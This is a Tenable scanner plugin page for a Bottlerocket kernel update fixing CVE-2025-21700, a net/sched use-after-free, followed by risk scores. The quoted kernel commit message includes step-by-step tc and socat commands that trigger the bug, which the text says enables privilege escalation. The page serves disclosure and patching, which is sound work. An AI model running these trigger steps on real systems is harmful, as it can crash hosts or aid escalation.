Bottlerocket: bottlerocket-kernel-5.15, kernel-5.15: security update to 5.15.179bottlerocket-kernel-6.1, kernel-6.1: security update to 6.1.131

high Tenable Cloud Security Plugin ID 428205

Description

There are packages installed that are affected by a vulnerability referenced in the following CVE:

- In the Linux kernel, the following vulnerability has been resolved: net: sched: Disallow replacing of
child qdisc from one parent to another Lion Ackermann was able to create a UAF which can be abused for
privilege escalation with the following script Step 1. create root qdisc tc qdisc add dev lo root handle
1:0 drr step2. a class for packet aggregation do demonstrate uaf tc class add dev lo classid 1:1 drr
step3. a class for nesting tc class add dev lo classid 1:2 drr step4. a class to graft qdisc to tc class
add dev lo classid 1:3 drr step5. tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024 step6. tc
qdisc add dev lo parent 1:2 handle 3:0 drr step7. tc class add dev lo classid 3:1 drr step 8. tc qdisc add
dev lo parent 3:1 handle 4:0 pfifo step 9. Display the class/qdisc layout tc class ls dev lo class drr 1:1
root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kb
tc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent
3:1 limit 1000p qdisc drr 3: dev lo parent 1:2 step10. trigger the bug <=== prevented by this patch tc
qdisc replace dev lo parent 1:3 handle 4:0 step 11. Redisplay again the qdiscs/classes tc class ls dev lo
class drr 1:1 root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 1:3 root leaf 4:
quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kb tc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc
plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p qdisc drr 3: dev lo parent
1:2 Observe that a) parent for 4:0 does not change despite the replace request. There can only be one
parent. b) refcount has gone up by two for 4:0 and c) both class 1:3 and 3:1 are pointing to it. Step 12.
send one packet to plug echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))
step13. send one packet to the grafted fifo echo "" | socat -u STDIN
UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003)) step14. lets trigger the uaf tc class delete dev lo
classid 1:3 tc class delete dev lo classid 1:1 The semantics of "replace" is for a del/add _on the same
node_ and not a delete from one node(3:1) and add to another node (1:3) as in step10. While we could "fix"
with a more complex approach there could be consequences to expectations so the patch takes the preventive
approach of "disallow such config". Joint work with Lion Ackermann <[email protected]> (CVE-2025-21700)

Plugin Details

Severity: High

ID: 428205

Version: Revision 1.2

Type: Local

Published: 6/30/2025

Updated: 7/2/2026

Supported Sensors: Tenable Cloud Security, Tenable Self-Hosted Container Security

Risk Information

VPR

Risk Factor: Medium

Score: 4.9

Percentile: 57.15

CVSS v2

Risk Factor: Medium

Base Score: 6.8

Temporal Score: 5

Vector: CVSS2#AV:L/AC:L/Au:S/C:C/I:C/A:C

CVSS Score Source: CVE-2025-21700

CVSS v3

Risk Factor: High

Base Score: 7.8

Temporal Score: 6.8

Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Temporal Vector: CVSS:3.0/E:U/RL:O/RC:C

Vulnerability Information

Exploit Ease: No known exploits are available

Vulnerability Publication Date: 2/13/2025

Reference Information

CVE: CVE-2025-21700